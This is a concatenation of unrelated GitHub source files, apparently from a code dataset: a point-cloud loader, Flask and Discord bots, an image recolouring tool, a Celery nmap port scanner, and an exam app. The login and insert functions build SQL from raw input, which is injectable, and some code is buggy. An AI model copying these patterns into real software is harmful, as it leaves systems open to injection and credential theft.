return selected_pc, selected_labels, selected_idx, np.array([cloud_ind], dtype=np.int32)
def get_data(self, file_path):
seq_id = file_path[0]
frame_id = file_path[1]
kd_tree_path = join(self.dataset_path, seq_id, 'KDTree', frame_id + '.pkl')
# read pkl with search tree
with open(kd_tree_path, 'rb') as f:
search_tree = pickle.load(f)
points = np.array(search_tree.data, copy=False)
# load labels
label_path = join(self.dataset_path, seq_id, 'labels', frame_id + '.npy')
labels = np.squeeze(np.load(label_path))
return points, search_tree, labels
@staticmethod
def crop_pc(points, labels, search_tree, pick_idx):
# crop a fixed size point cloud for training
center_point = points[pick_idx, :].reshape(1, -1)
select_idx = search_tree.query(center_point, k=cfg.num_points)[1][0]
select_idx = DP.shuffle_idx(select_idx)
select_points = points[select_idx]
select_labels = labels[select_idx]
return select_points, select_labels, select_idx
def tf_map(self, batch_pc, batch_label, batch_pc_idx, batch_cloud_idx):
features = batch_pc
input_points = []
input_neighbors = []
input_pools = []
input_up_samples = []
for i in range(cfg.num_layers):
neighbour_idx = DP.knn_search(batch_pc, batch_pc, cfg.k_n)
sub_points = batch_pc[:, :batch_pc.shape[1] // cfg.sub_sampling_ratio[i], :]
pool_i = neighbour_idx[:, :batch_pc.shape[1] // cfg.sub_sampling_ratio[i], :]
up_i = DP.knn_search(sub_points, batch_pc, 1)
input_points.append(batch_pc)
input_neighbors.append(neighbour_idx)
input_pools.append(pool_i)
input_up_samples.append(up_i)
batch_pc = sub_points
input_list = input_points + input_neighbors + input_pools + input_up_samples
input_list += [features, batch_label, batch_pc_idx, batch_cloud_idx]
return input_list
def collate_fn(self, batch):
selected_pc, selected_labels, selected_idx, cloud_ind = [], [], [], []
for i in range(len(batch)):
selected_pc.append(batch[i][0])
selected_labels.append(batch[i][1])
selected_idx.append(batch[i][2])
cloud_ind.append(batch[i][3])
selected_pc = np.stack(selected_pc)
selected_labels = np.stack(selected_labels)
selected_idx = np.stack(selected_idx)
cloud_ind = np.stack(cloud_ind)
flat_inputs = self.tf_map(selected_pc, selected_labels, selected_idx, cloud_ind)
num_layers = cfg.num_layers
inputs = {}
inputs['xyz'] = []
for tmp in flat_inputs[:num_layers]:
inputs['xyz'].append(torch.from_numpy(tmp).float())
inputs['neigh_idx'] = []
for tmp in flat_inputs[num_layers: 2 * num_layers]:
inputs['neigh_idx'].append(torch.from_numpy(tmp).long())
inputs['sub_idx'] = []
for tmp in flat_inputs[2 * num_layers:3 * num_layers]:
inputs['sub_idx'].append(torch.from_numpy(tmp).long())
inputs['interp_idx'] = []
for tmp in flat_inputs[3 * num_layers:4 * num_layers]:
inputs['interp_idx'].append(torch.from_numpy(tmp).long())
inputs['features'] = torch.from_numpy(flat_inputs[4 * num_layers]).transpose(1, 2).float()
inputs['labels'] = torch.from_numpy(flat_inputs[4 * num_layers + 1]).long()
return inputs
``` |
{
"source": "13955413303/zgc",
"score": 2
} |
#### File: zgc/app/__init__.py
```python
from flask import Flask
from app.ext import init_ext
def create_app():
app= Flask(__name__)
init_ext(app)
return app
```
#### File: zgc/app/models.py
```python
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class books(db.Model):
id = db.Column(db.Integer,primary_key=True,autoincrement=True)
name = db.Column(db.String(16))
auth = db.Column(db.String(16))
def __str__(self) -> str:
return 'name:%s,auth:%s'%(self.name,self.auth)
class user(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(16))
phone = db.Column(db.Integer)
``` |
{
"source": "13984328535/nianhuatest",
"score": 2
} |
#### File: nianhuatest/home_application/celery_tasks.py
```python
import datetime
from celery import task
from celery.schedules import crontab
from celery.task import periodic_task
from common.log import logger
import os
import time
import re
import socket
from home_application.models import PortScanPara,PortScan
from threading import Thread
import nmap
def hostIpList():
return socket.gethostbyname_ex(socket.gethostname())[2]
def check_ip(ipAddr):
compile_ip=re.compile('^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$')
if compile_ip.match(ipAddr):
return True
else:
return False
def hostname():
sys = os.name
if sys == 'nt':
hostname = os.getenv('computername')
return hostname
elif sys == 'posix':
host = os.popen('echo $HOSTNAME')
try:
hostname = host.read()
return hostname
finally:
host.close()
else:
return 'Unkwon hostname'
def nmapScan(hostname,tip, port):
portscan_recode = PortScan(source_hostname=hostname, target_ip=tip, target_port=port,state="正在扫描...",protocol="TCP")
portscan_recode.save()
nmScan = nmap.PortScanner()
nmScan.scan(tip, port, arguments='-T4 -Pn')
state = nmScan[tip]['tcp'][int(port)]['state']
PortScan.objects.filter(source_hostname=hostname, target_ip=tip, target_port=port).update(state=state, scan_time=time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(time.time())))
@task()
def async_portscan():
logger.error(u"celery 定时任务执行成功,async_portscan")
last_scantask = PortScanPara.objects.filter().last()
host = hostname();
source_hostname = last_scantask.source_hostname
target_ip = last_scantask.target_ip
target_port = last_scantask.target_port
target_ips = str(target_ip).split(',')
target_ports = str(target_port).split(',')
for target_ip in target_ips:
for target_port in target_ports:
t = Thread(target = nmapScan,args = (str(source_hostname), str(target_ip), str(target_port)))
t.start()
@task()
def async_task(x, y):
"""
定义一个 celery 异步任务
"""
logger.error(u"celery 定时任务执行成功,执行结果:{:0>2}:{:0>2}".format(x, y))
return x + y
def execute_task():
"""
执行 celery 异步任务
调用celery任务方法:
task.delay(arg1, arg2, kwarg1='x', kwarg2='y')
task.apply_async(args=[arg1, arg2], kwargs={'kwarg1': 'x', 'kwarg2': 'y'})
delay(): 简便方法,类似调用普通函数
apply_async(): 设置celery的额外执行选项时必须使用该方法,如定时(eta)等
详见 :http://celery.readthedocs.org/en/latest/userguide/calling.html
"""
now = datetime.datetime.now()
logger.error(u"celery 定时任务启动,将在60s后执行,当前时间:{}".format(now))
# 调用定时任务
async_task.apply_async(args=[now.hour, now.minute], eta=now + datetime.timedelta(seconds=60))
@periodic_task(run_every=crontab(minute='*/5', hour='*', day_of_week="*"))
def get_time():
"""
celery 周期任务示例
run_every=crontab(minute='*/5', hour='*', day_of_week="*"):每 5 分钟执行一次任务
periodic_task:程序运行时自动触发周期任务
"""
execute_task()
now = datetime.datetime.now()
logger.error(u"celery 周期任务调用成功,当前时间:{}".format(now))
``` |
{
"source": "13A5T0N/rs_examen",
"score": 3
} |
#### File: rs_examen/api/examen.py
```python
import conn,numpy as np
import pandas as pd
from flask import jsonify,json
db = conn.cursor
def add_examen(db,titel,vak,klas):
sql = "INSERT INTO examen(examen_titel,vak,klas) value('" + titel + "','" + vak + "','" + klas + "')"
db.execute(sql)
conn.db.commit()
def import_vragen(path):
# df = pd.DataFrame(pd.read_csv (r'%s' %path), columns = ['Vraag','Antwoord1','Antwoord2','Antwoord3','Antwoord4','CorrecteAntwoord'])
df = pd.read_csv (r'%s' %path)
data = df.to_dict(orient='records')
for record in data:
# Antwoord1,Antwoord2,Antwoord3,Antwoord4,CorrecteAntwoord,Vraag = record
db.execute('''
INSERT INTO vragen (vraag, ant_1, ant_2,ant_3,ant_4)
VALUES (%s,%s,%s,%s,%s)
''',
(
record['Vraag'],
record['Antwoord1'],
record['Antwoord2'],
record['Antwoord3'],
record['Antwoord4']
)
)
print(record)
return 'True'
# print (df)
# sql= ""
# db.execute(sql)
# conn.db.commit()
def add_antw(db,file):
# import CSV
data = pd.read_csv(file)
df = pd.DataFrame(data, columns = ['Vraag','Antwoord1','Antwoord2','Antwoord3','Antwoord4','CorrecteAntwoord'])
# insert data
for row in df.itertuple():
db.execute('''
INSERT INTO vragen (vraag, ant_1, ant_2,ant_3,ant_4,cor_ant)
VALUES (?,?,?,?,?)
''',
row.Vraag,
row.Antwoord1,
row.Antwoord2,
row.Antwoord3,
row.Antwoord4,
row.CorrecteAntwoord
)
conn.db.commit()
```
#### File: rs_examen/api/user.py
```python
import conn
def login(db,user,pwd):
sql = "SELECT * from gebruikers where geb_email = '" + user + "'and geb_password ='" + pwd +"'"
db.execute(sql)
result = db.fetchall()
for row in result:
return row
def get_studenten(db):
vak = []
db.execute("SELECT * from gebruikers where geb_rol ='student'")
result = db.fetchall()
resp = result
return resp
def add_student(db,naam,voornaam,email):
sql = "INSERT INTO gebruikers(geb_password,geb_rol,geb_naam,geb_voornaam,geb_email) value('student','student','" + naam + "','" + voornaam + "','" + email + "')"
db.execute(sql)
conn.db.commit()
def latest_student(db):
vak = []
db.execute("SELECT * from gebruikers where geb_rol ='student' ORDER BY geb_id DESC LIMIT 1")
result = db.fetchall()
resp = result
return resp
``` |
{
"source": "13ace37/gruvbox-factory",
"score": 2
} |
#### File: 13ace37/gruvbox-factory/conv.py
```python
import signal
import argparse
import sys
import os
from pathlib import Path
from ImageGoNord import GoNord
from rich.console import Console
from rich.panel import Panel
def main():
signal.signal(signal.SIGINT, signal_handler)
console = Console()
gruvbox_factory = GoNord()
gruvbox_factory.reset_palette()
add_gruvbox_palette(gruvbox_factory)
# Checks if there's an argument
if len(sys.argv) > 1:
image_paths = fromCommandArgument(console)
else:
image_paths = fromTui(console)
for image_path in image_paths:
if os.path.isfile(image_path):
process_image(image_path, console, gruvbox_factory)
else:
console.print(
f"❌ [red]We had a problem in the pipeline! \nThe image at '{image_path}' could not be found! \nSkipping... [/]"
)
continue
# Gets the file path from the Argument
def fromCommandArgument(console):
command_parser = argparse.ArgumentParser(
description="A simple cli to manufacture nord themed wallpapers."
)
command_parser.add_argument(
"Path", metavar="path", nargs="+", type=str, help="The path(s) to the image(s)."
)
args = command_parser.parse_args()
return args.Path
# Gets the file path from user input
def fromTui(console):
console.print(
Panel(
"🏭 [bold green] Gruvbox Factory [/] 🏭", expand=False, border_style="yellow"
)
)
return [
os.path.expanduser(path)
for path in console.input(
"🖼️ [bold yellow]Which image(s) do you want to manufacture? (image paths separated by spaces):[/] "
).split()
]
def process_image(image_path, console, gruvbox_factory):
image = gruvbox_factory.open_image(image_path)
console.print(f"🔨 [yellow]manufacturing '{os.path.basename(image_path)}'...[/]")
# TODO: might be a better idea to save the new Image in the same directory the command is being run from
save_path = os.path.join(
os.path.dirname(image_path), "nord_" + os.path.basename(image_path)
)
gruvbox_factory.convert_image(image, save_path=(save_path))
console.print(f"✅ [bold green]Done![/] [green](saved at '{save_path}')[/]")
def add_gruvbox_palette(gruvbox_factory):
colorPalette = ["#2E3440","#3B4252","#434C5E","#4C566A","#D8DEE9","#E5E9F0","#ECEFF4","#8FBCBB","#88C0D0","#81A1C1","#5E81AC","#BF616A","#D08770","#EBCB8B","#A3BE8C","#B48EAD"]
for color in colorPalette:
gruvbox_factory.add_color_to_palette(color)
## handle CTRL + C
def signal_handler(signal, frame):
print()
sys.exit(0)
if __name__ == "__main__":
main()
``` |
{
"source": "13ace37/python-discord",
"score": 2
} |
#### File: python-discord/commands/handler.py
```python
from importlib import import_module
def run(command, args):
__command__ = import_module("commands." + command, "./" + command + ".py")
__command__.run(args)
```
#### File: 13ace37/python-discord/index.py
```python
from os import getcwd as getDir
from os.path import isfile as existFile
from discord import Client
# Welcome to the hardcode area :)
token = "token" # todo: move this into a config or env variables
prefix = "!" # todo: move this into a config or env variables
# Welcome to the hardcode area :)
client = Client()
@client.event
async def on_ready():
print(f'Successfully logged into {client.user}!')
@client.event
async def on_message(message):
if message.author == client.user:
return
if not message.content.startswith(prefix):
return
args = message.content.split()
command = args[0][len(prefix):len(args[0])]
args.pop(0)
if (existFile(getDir()+"/commands/" + command + ".py")):
import commands.handler as CommandHandler
CommandHandler.run(command, args)
client.run(token)
``` |
Subsets and Splits